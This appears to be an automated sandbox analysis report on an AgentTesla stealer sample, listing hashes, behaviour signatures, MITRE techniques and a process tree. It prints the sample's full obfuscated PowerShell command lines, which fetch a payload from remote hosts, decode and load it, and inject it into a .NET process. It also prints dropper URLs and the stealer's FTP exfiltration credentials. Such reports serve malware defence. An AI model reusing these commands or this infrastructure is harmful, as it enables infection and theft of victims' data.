agenttesla | fa54825b8b94917037cc1620eb21421f9bd31ac394f396c1fe80546e4ed88dfa

Analysis

max time kernel
93s
max time network
139s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
20-11-2024 07:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

seethebestthingswithgreatsituationshandletotheprogress.hta
Size

178KB
MD5

01928c833c9940a6896666a9d93b9670
SHA1

abe22dd055a6fa39c615cf72818e474f2525e7ae
SHA256

fa54825b8b94917037cc1620eb21421f9bd31ac394f396c1fe80546e4ed88dfa
SHA512

e34bc23996ab1ec12117e463f8b8ec5b4e880635d435286d3e4d09c8499c044dd2f92d8c2927e1435287691ae14dc1e1f7331c2aeae103ca9ac56022b9d883e0
SSDEEP

48:4vahW5oZz7eWLB2CCz7lRo7dmz7lOwo7dO81bBPW1zKfD299Ddaq6bWyxf9DZRDf:4vCl17nuYMiFeAqfoqyWyflRJm0cfQ

Score

10^/10

agenttesla defense_evasion discovery execution keylogger spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Extracted

Family

agenttesla

Credentials

Protocol: ftp
Host:
ftp://ftp.elquijotebanquetes.com
Port:
21
Username:
[email protected]
Password:
4r@d15PS!-!h

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Agenttesla family
agenttesla
Blocklisted process makes network request 3 IoCs

Processes:

POWeRSHElL.EXepowershell.exe

flow pid process

14 1728 POWeRSHElL.EXe
20 3924 powershell.exe
23 3924 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

3724 powershell.exe
3924 powershell.exe
Evasion via Device Credential Deployment 2 IoCs
defense_evasion execution

Processes:

POWeRSHElL.EXepowershell.exe

pid process

1728 POWeRSHElL.EXe
4032 powershell.exe

flow	pid	process
14	1728	POWeRSHElL.EXe
20	3924	powershell.exe
23	3924	powershell.exe

pid	process
3724	powershell.exe
3924	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

mshta.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

24 ip-api.com
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 3924 set thread context of 4900 3924 powershell.exe AddInProcess32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	ioc
24	ip-api.com

description	pid	process	target process
PID 3924 set thread context of 4900	3924	powershell.exe	AddInProcess32.exe

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

powershell.execsc.exeWScript.exepowershell.exepowershell.exemshta.exePOWeRSHElL.EXecvtres.exeAddInProcess32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	POWeRSHElL.EXe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

POWeRSHElL.EXepowershell.exepowershell.exepowershell.exeAddInProcess32.exe

pid	process
1728	POWeRSHElL.EXe
1728	POWeRSHElL.EXe
4032	powershell.exe
4032	powershell.exe
3724	powershell.exe
3724	powershell.exe
3924	powershell.exe
3924	powershell.exe
3924	powershell.exe
3924	powershell.exe
4900	AddInProcess32.exe
4900	AddInProcess32.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

POWeRSHElL.EXepowershell.exepowershell.exepowershell.exeAddInProcess32.exe

description	pid	process
Token: SeDebugPrivilege	1728	POWeRSHElL.EXe
Token: SeDebugPrivilege	4032	powershell.exe
Token: SeDebugPrivilege	3724	powershell.exe
Token: SeDebugPrivilege	3924	powershell.exe
Token: SeDebugPrivilege	4900	AddInProcess32.exe

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

mshta.exePOWeRSHElL.EXecsc.exeWScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 1972 wrote to memory of 1728	1972	mshta.exe	POWeRSHElL.EXe
PID 1972 wrote to memory of 1728	1972	mshta.exe	POWeRSHElL.EXe
PID 1972 wrote to memory of 1728	1972	mshta.exe	POWeRSHElL.EXe
PID 1728 wrote to memory of 4032	1728	POWeRSHElL.EXe	powershell.exe
PID 1728 wrote to memory of 4032	1728	POWeRSHElL.EXe	powershell.exe
PID 1728 wrote to memory of 4032	1728	POWeRSHElL.EXe	powershell.exe
PID 1728 wrote to memory of 1356	1728	POWeRSHElL.EXe	csc.exe
PID 1728 wrote to memory of 1356	1728	POWeRSHElL.EXe	csc.exe
PID 1728 wrote to memory of 1356	1728	POWeRSHElL.EXe	csc.exe
PID 1356 wrote to memory of 1704	1356	csc.exe	cvtres.exe
PID 1356 wrote to memory of 1704	1356	csc.exe	cvtres.exe
PID 1356 wrote to memory of 1704	1356	csc.exe	cvtres.exe
PID 1728 wrote to memory of 3120	1728	POWeRSHElL.EXe	WScript.exe
PID 1728 wrote to memory of 3120	1728	POWeRSHElL.EXe	WScript.exe
PID 1728 wrote to memory of 3120	1728	POWeRSHElL.EXe	WScript.exe
PID 3120 wrote to memory of 3724	3120	WScript.exe	powershell.exe
PID 3120 wrote to memory of 3724	3120	WScript.exe	powershell.exe
PID 3120 wrote to memory of 3724	3120	WScript.exe	powershell.exe
PID 3724 wrote to memory of 3924	3724	powershell.exe	powershell.exe
PID 3724 wrote to memory of 3924	3724	powershell.exe	powershell.exe
PID 3724 wrote to memory of 3924	3724	powershell.exe	powershell.exe
PID 3924 wrote to memory of 2808	3924	powershell.exe	AddInProcess32.exe
PID 3924 wrote to memory of 2808	3924	powershell.exe	AddInProcess32.exe
PID 3924 wrote to memory of 2808	3924	powershell.exe	AddInProcess32.exe
PID 3924 wrote to memory of 4900	3924	powershell.exe	AddInProcess32.exe
PID 3924 wrote to memory of 4900	3924	powershell.exe	AddInProcess32.exe
PID 3924 wrote to memory of 4900	3924	powershell.exe	AddInProcess32.exe
PID 3924 wrote to memory of 4900	3924	powershell.exe	AddInProcess32.exe
PID 3924 wrote to memory of 4900	3924	powershell.exe	AddInProcess32.exe
PID 3924 wrote to memory of 4900	3924	powershell.exe	AddInProcess32.exe
PID 3924 wrote to memory of 4900	3924	powershell.exe	AddInProcess32.exe
PID 3924 wrote to memory of 4900	3924	powershell.exe	AddInProcess32.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestthingswithgreatsituationshandletotheprogress.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1972
- C:\Windows\SysWOW64\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe
  "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1728
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4032
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0wpgrnid\0wpgrnid.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1356
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBC6A.tmp" "c:\Users\Admin\AppData\Local\Temp\0wpgrnid\CSC25CC9BF65F124CEDBF61753D98E24BDB.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1704
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3120
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdlVGV4JysndCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKERwM2ltYWdlQnl0ZXMpO0RwM3N0YXJ0RmxhZyA9IEYxbTwnKyc8QkFTRTY0X1NUQVJUPj5GMW0nKyc7RHAzZW5kRmxhZyA9IEYxbTw8QkFTRTY0X0VORD4+RjFtO0RwM3N0YXJ0SScrJ25kZXggPSBEcDNpbWFnZVRleHQuSW5kZXhPZihEcDNzdGFydEZsYWcpO0RwM2VuZEluZGUnKyd4ID0gRHAzaW1hZ2VUZXh0LkluZGV4T2YoRHAzZW4nKydkJysnRmxhZyk7RHAzc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIERwM2VuZEluZGV4IC1nJysndCBEcDNzdGFydEluZGV4O0RwM3N0YXJ0SW5kZXggKz0gRHAzc3RhcnQnKydGJysnbGFnLkxlbmd0aDtEcDNiYXNlNjRMZW5ndGggPSBEcDNlbmRJbmRleCAtIERwM3N0YXJ0SW5kZXg7RHAzYmFzJysnZTY0Q29tbWFuZCA9IERwM2ltYWdlVGV4dC5TdWJzdHJpbmcoRHAzc3RhcnRJbmRleCwgRHAzYmFzZTY0TGVuZ3RoKTtEcDNiYXNlNjRSZXZlcicrJ3NlZCA9IC1qb2luIChEcDNiYXNlNjRDb21tYW5kLlRvQ2gnKydhckFyJysncmF5KCkgNTl0IEZvckVhY2gtT2JqZWN0IHsgRHAzXyB9KVstMS4uLScrJyhEcDNiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldO0RwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbicrJ2coJysnRHAzYicrJ2FzZTY0UmV2ZXJzZWQpO0RwM2xvYWQnKydlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZScrJ2N0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChEcDNjb21tYW5kQnl0ZXMpO0RwM3ZhaU1ldGhvZCcrJyA9JysnIFtkJysnbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoRjFtVkFJRjFtKTtEcDN2YWlNZXRob2QuSW52bycrJ2tlKERwM251bGwsIEAoRjFtdHh0LkZSRkZSVy8yNTMvMzEuMjIuMy4yOTEvLzpwdHRoRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGJysnMW1kZXNhdGl2YWRvRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGMW1BZGRJblAnKydyb2Nlc3MzJysnMkYxbSwgRjFtZGVzYXRpdmFkb0YxbSwgRjFtZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLEYxbWRlc2F0aXZhZG9GMScrJ20sRjFtJysnZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLCcrJ0YxbWRlc2F0aXZhZG9GMW0sRjFtMUYxbSxGMW1kZXNhdGl2YWRvRjFtKSk7JykuUkVwbGFjZSgoW2NoYVJdNzArW2NoYVJdNDkrW2NoYVJdMTA5KSxbc1RSSU5nXVtjaGFSXTM5KS5SRXBsYWNlKChbY2hhUl02OCtbY2hhUl0xMTIrW2NoYVJdNTEpLCckJykuUkVwbGFjZSgoW2NoYVJdNTMrW2NoYVJdNTcrW2NoYVJdMTE2KSxbc1RSSU5nXVtjaGFSXTEyNCl8IC4oKEdldC1WQVJJYWJMRSAnKm1kcionKS5OYW1lWzMsMTEsMl0tSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3724
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+'::Load(Dp3commandBytes);Dp3vaiMethod'+' ='+' [d'+'nlib.IO.Home].GetMethod(F1mVAIF1m);Dp3vaiMethod.Invo'+'ke(Dp3null, @(F1mtxt.FRFFRW/253/31.22.3.291//:ptthF1m, F1mdesativadoF1m, F'+'1mdesativadoF1m, F1mdesativadoF1m, F1mAddInP'+'rocess3'+'2F1m, F1mdesativadoF1m, F1mdesativadoF1m,F1mdesativadoF1m,F1mdesativadoF1'+'m,F1m'+'desativadoF1m,F1mdesativadoF1m,'+'F1mdesativadoF1m,F1m1F1m,F1mdesativadoF1m));').REplace(([chaR]70+[chaR]49+[chaR]109),[sTRINg][chaR]39).REplace(([chaR]68+[chaR]112+[chaR]51),'$').REplace(([chaR]53+[chaR]57+[chaR]116),[sTRINg][chaR]124)| .((Get-VARIabLE '*mdr*').Name[3,11,2]-JoiN'')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3924
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        6⤵
        
        PID:2808
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4900

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\POWeRSHElL.EXe.log

Filesize
2KB

MD5
3d086a433708053f9bf9523e1d87a4e8

SHA1
b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

SHA256
6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

SHA512
931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
adeceb29603bcbfb0bd5667f51db5893

SHA1
779e1dba9086faf40a412c06cc4b9d4ec1ec6973

SHA256
5ec4f11fc0a7a00be61392a3046caacec8fb802d610b8a17e9511c9a5be2c48c

SHA512
bbabba69b20d743f68278b26e1a93caa33df37c8db5494db0bb7e19a5918e7460c40fcd98973732f8fc0523cd1324575b70d19fa582a78f8a899ed99576f6c24

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
c24eebff29caceeb385ba897697e7f0f

SHA1
5caf4f32cab05a44dd49299cea88c8ae73684288

SHA256
44a7e8c355a33d016d44a6e80c403aac2db2b18f2bd79a8f8d39536723d44503

SHA512
9744260a72222fe89d76ead445e88633e4a4b239ae01f68ce51935a4be0604f52927b7071d8bf17f871eeaf8c02034083deb9ffcdff20ba29fa51b6eed3cd593

Download Submit
C:\Users\Admin\AppData\Local\Temp\0wpgrnid\0wpgrnid.dll

Filesize
3KB

MD5
2a1f4def26875dd439144187377460ec

SHA1
eb2c571e6e0b059bd48c62d121020de207309acc

SHA256
d8260eda696480926d730972bf2998bda79a719aba6e0ed88f8042f40ec11757

SHA512
fbf9f30ca210c00a94ededbf53ca0cc7ce20663bfe3d26bd7dc65859a97136e9edcfc99364ebe8951d6c8401a21f61ef0f4fb4583cac4b98dfe63525fca5b53a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESBC6A.tmp

Filesize
1KB

MD5
e73d5cf4d1d36bde66a98d7fab8280a2

SHA1
076e732cb7f5008109fec101d961a1d4c8009fcc

SHA256
8fa262399d8606e90687189518094f8fe643997d964079571e90f632ca186824

SHA512
82ad2ab33ad52e32d448a33f72d85ada8b8e9a987987457f83f8aa7180a8fb89cecfcc2e2a53527c0ddb22bcdf72d47031c3e09ccef7ed022b0fc553d6e40d2d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wqyoqcko.xe3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS

Filesize
138KB

MD5
2a43f3918d91622e9ccac7889f3e6dc2

SHA1
7d6131261e7f6a54291bd9e02eb7c985e093cfa7

SHA256
95f59c4235c1d4516b7d5de5a768f0f00c4a64c73a5be26fb26496ac5f378e9b

SHA512
422b39acb1dcacc05938ee122fa614a9a429e28a6a7f7ecf8a7f8416823b0e7ada11c28b7fe52ae1352d85fc99423ffdb16fd85ec2ac27f25a2f3adfed7b638c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0wpgrnid\0wpgrnid.0.cs

Filesize
485B

MD5
d24098e842acdc16d68eb9fc1eb0d97d

SHA1
a5ed59b81d7a78e4f619850c0d05f05984c282a7

SHA256
5a2115bb93abacd6e4cf9c0fc15f629c527fc13513305ffae22ba8872db0e309

SHA512
9a387056470cd7b1cadc638ca29227303a6c447eb551d219fbf0fb0e4c4265d9b9d40e3830088bb8eae3626ceb827de0ccb827c68b5d6a878ac1d1d17056d9ae

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0wpgrnid\0wpgrnid.cmdline

Filesize
369B

MD5
b5312230dd1f85cb7dc519320a78e479

SHA1
71f56fbc24bb1e3d18a898860f96f653d71c1264

SHA256
940182fb91ca30f6dfffeac3a247cc9e7909dd539d0e60929c0f3ff60c123c0f

SHA512
9081a919af023a85a46a216b6ae4de77e9509db20b1b382a9bb12dd92d856e4279c0610301432ee4dc6df8ac5bb48739de65e6d503ae073236e248ae21bdaae6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0wpgrnid\CSC25CC9BF65F124CEDBF61753D98E24BDB.TMP

Filesize
652B

MD5
65dc07077fbd127ab844aa3efd8e63e9

SHA1
9c67d7a529256c2d4b41c7b5a4c5c8851a7ba8c6

SHA256
3f9d10ef8c2243e92e63a3ce1bf0738c64bf61585d03d24c38c71d047750ec31

SHA512
2bc1adfc6d79241c293dcc7469a19dcc825ae702610c2f8cd525d3cd578f451d576909f3165d92be6ebfdfcab8ed996084e5abecbd7dff683258d989bd0858e5

Download Submit
memory/1728-19-0x00000000069C0000-0x0000000006A0C000-memory.dmp

Filesize
304KB

Download
memory/1728-2-0x0000000005B40000-0x0000000006168000-memory.dmp

Filesize
6.2MB

Download
memory/1728-1-0x00000000053D0000-0x0000000005406000-memory.dmp

Filesize
216KB

Download
memory/1728-78-0x0000000071290000-0x0000000071A40000-memory.dmp

Filesize
7.7MB

Download
memory/1728-0-0x000000007129E000-0x000000007129F000-memory.dmp

Filesize
4KB

Download
memory/1728-3-0x0000000071290000-0x0000000071A40000-memory.dmp

Filesize
7.7MB

Download
memory/1728-4-0x0000000071290000-0x0000000071A40000-memory.dmp

Filesize
7.7MB

Download
memory/1728-72-0x0000000071290000-0x0000000071A40000-memory.dmp

Filesize
7.7MB

Download
memory/1728-71-0x000000007129E000-0x000000007129F000-memory.dmp

Filesize
4KB

Download
memory/1728-65-0x0000000006F20000-0x0000000006F28000-memory.dmp

Filesize
32KB

Download
memory/1728-5-0x00000000059C0000-0x00000000059E2000-memory.dmp

Filesize
136KB

Download
memory/1728-6-0x00000000062E0000-0x0000000006346000-memory.dmp

Filesize
408KB

Download
memory/1728-7-0x0000000006350000-0x00000000063B6000-memory.dmp

Filesize
408KB

Download
memory/1728-17-0x00000000063C0000-0x0000000006714000-memory.dmp

Filesize
3.3MB

Download
memory/1728-18-0x0000000006970000-0x000000000698E000-memory.dmp

Filesize
120KB

Download
memory/3724-88-0x0000000005DE0000-0x0000000006134000-memory.dmp

Filesize
3.3MB

Download
memory/3924-100-0x00000000071E0000-0x000000000727C000-memory.dmp

Filesize
624KB

Download
memory/3924-99-0x0000000006FE0000-0x0000000007138000-memory.dmp

Filesize
1.3MB

Download
memory/4032-40-0x00000000073F0000-0x000000000740E000-memory.dmp

Filesize
120KB

Download
memory/4032-47-0x00000000079D0000-0x00000000079DE000-memory.dmp

Filesize
56KB

Download
memory/4032-45-0x0000000007A30000-0x0000000007AC6000-memory.dmp

Filesize
600KB

Download
memory/4032-44-0x0000000007800000-0x000000000780A000-memory.dmp

Filesize
40KB

Download
memory/4032-43-0x00000000077A0000-0x00000000077BA000-memory.dmp

Filesize
104KB

Download
memory/4032-42-0x0000000007DF0000-0x000000000846A000-memory.dmp

Filesize
6.5MB

Download
memory/4032-41-0x0000000007650000-0x00000000076F3000-memory.dmp

Filesize
652KB

Download
memory/4032-50-0x0000000007A20000-0x0000000007A28000-memory.dmp

Filesize
32KB

Download
memory/4032-30-0x000000006DB50000-0x000000006DB9C000-memory.dmp

Filesize
304KB

Download
memory/4032-46-0x00000000079A0000-0x00000000079B1000-memory.dmp

Filesize
68KB

Download
memory/4032-48-0x00000000079E0000-0x00000000079F4000-memory.dmp

